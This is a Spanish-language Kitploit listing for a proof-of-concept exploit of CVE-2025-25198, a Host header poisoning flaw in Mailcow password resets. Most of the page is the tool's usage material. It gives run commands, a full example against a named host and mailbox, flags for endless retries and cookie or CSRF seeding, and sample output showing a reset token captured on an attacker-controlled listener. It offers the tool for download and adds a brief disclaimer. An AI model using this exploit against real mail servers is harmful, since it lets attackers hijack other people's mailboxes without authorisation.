Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-25198-PoC — PoC para CVE-2025-25198: prueba automatizada de envenenamiento de cabecera Host para Mailcow - listener HTTPS, manejo automático de cookies/CSRF, captura el primer enlace de restablecimiento. | Kitploit
Herramientas/GitHubGitHub/groppoxx/cve-2025-25198-poc
Ataques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubgroppoxx/cve-2025-25198-poc

CVE-2025-25198-PoC

PoC para CVE-2025-25198: prueba automatizada de envenenamiento de cabecera Host para Mailcow - listener HTTPS, manejo automático de cookies/CSRF, captura el primer enlace de restablecimiento.

Ver Repositorio
2012hace 3 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2025-25198-PoC

Prueba de concepto para CVE-2025-25198, un problema de envenenamiento de cabecera Host que afecta los flujos de restablecimiento de contraseña de Mailcow.

El script inicia un listener HTTPS local en el puerto 443, obtiene un token CSRF válido automáticamente, envía la secuencia de restablecimiento de contraseña con una cabecera Host envenenada, y se detiene cuando se recupera un enlace de restablecimiento ya sea de la respuesta HTTP o de una devolución de llamada al listener.

Qué hace

  1. Inicia un listener HTTPS con un certificado autofirmado.
  2. Crea una nueva sesión de cliente HTTP.
  3. Obtiene un token CSRF automáticamente.
  4. Envía el flujo de restablecimiento con una cabecera Host controlada.
  5. Extrae enlaces de restablecimiento de respuestas y redirecciones.
  6. Espera un impacto en el listener si el objetivo envía el enlace fuera de banda.
  7. Se detiene en el primer enlace de restablecimiento válido y lo imprime limpiamente.

Requisitos

root@kitploit:~
Python 3.8+
OpenSSL in PATH
sudo/root privileges to bind port 443
Inbound TCP/443 reachable from the target

Instalar dependencias:

root@kitploit:~
pip install -r requirements.txt

Inicio rápido

Los valores entre paréntesis angulares son marcadores de posición. Reemplázalos con tus propios valores y no incluyas los caracteres < o >.

root@kitploit:~
sudo python3 cve_2025_25198.py \
  --listen-host 0.0.0.0 \
  --base-url <MAILCOW_URL> \
  --username <MAILBOX> \
  --attacker-host <ATTACKER_HOST> \
  --http2

Marcadores de posición

root@kitploit:~
<MAILCOW_URL>    # Target Mailcow base URL. Example: https://mail.example.com
<MAILBOX>        # Mailbox/user passed to the reset form. Usually an email address.
<ATTACKER_HOST>  # IP or DNS name that the target can reach on TCP/443.

Ejemplo completo

root@kitploit:~
sudo python3 cve_2025_25198.py \
  --listen-host 0.0.0.0 \
  --base-url https://mail.cows.com \
  --username [email protected] \
  --attacker-host 10.10.13.12 \
  --http2

Salida de ejemplo:

root@kitploit:~
[2026-05-17T18:30:12Z] [+] HTTPS listener on https://0.0.0.0:443
[2026-05-17T18:30:13Z] [+] Auto CSRF: 0123456789abcdef...
[2026-05-17T18:30:13Z] [>] Sending sequence with poisoned Host
[2026-05-17T18:30:14Z] [HIT] GET /reset-password?token=AAAA-BBBB-CCCC-DDDD ← 10.10.13.12 [200]

╔════════════════════════════════════════════════════════════════════════════════╗
║  RESET LINK FOUND!  (listener)                                                 ║
╟════════════════════════════════════════════════════════════════════════════════╢
║  https://mail.cows.com/reset-password?token=AAAA-BBBB-CCCC-DDDD                ║
║  Target: mail.cows.com                                                         ║
╚════════════════════════════════════════════════════════════════════════════════╝

Demostración

asciicast

Banderas opcionales

root@kitploit:~
--http2
   Use HTTP/2 via httpx. Recommended for best parity with modern browsers.

--interval <seconds>
   Seconds between attempts and listener wait windows. Default: 8

--max-attempts <N>
   Stop after N attempts. Default: 0, which means retry indefinitely.

--cookie '<pairs>'
   Seed the client cookie jar manually.
   Example: --cookie 'PHPSESSID=abcdef123456; another=value'

--csrf <TOKEN>
   Use a known CSRF token instead of auto-discovery.

--only-final
   Hide progress logs and print only the final reset-link banner.

Notas

  • El listener siempre se vincula al puerto 443.
  • En Linux/macOS, vincular el puerto 443 requiere sudo o root.
  • El objetivo debe poder alcanzar https://<ATTACKER_HOST>/.
  • Si se encuentra un enlace de restablecimiento en una respuesta HTTP, el script sale inmediatamente.
  • Si no se encuentra ningún enlace en la respuesta, el script espera una devolución de llamada al listener HTTPS.
  • Si no se recupera ningún enlace, la secuencia se reintenta cada 8 segundos por defecto.
  • server.pem y server.key se generan automáticamente si faltan.

Legal

Este PoC está destinado para pruebas de seguridad autorizadas, entornos de laboratorio y verificación de vulnerabilidades. No lo uses contra sistemas sin permiso explícito.

Descargar herramienta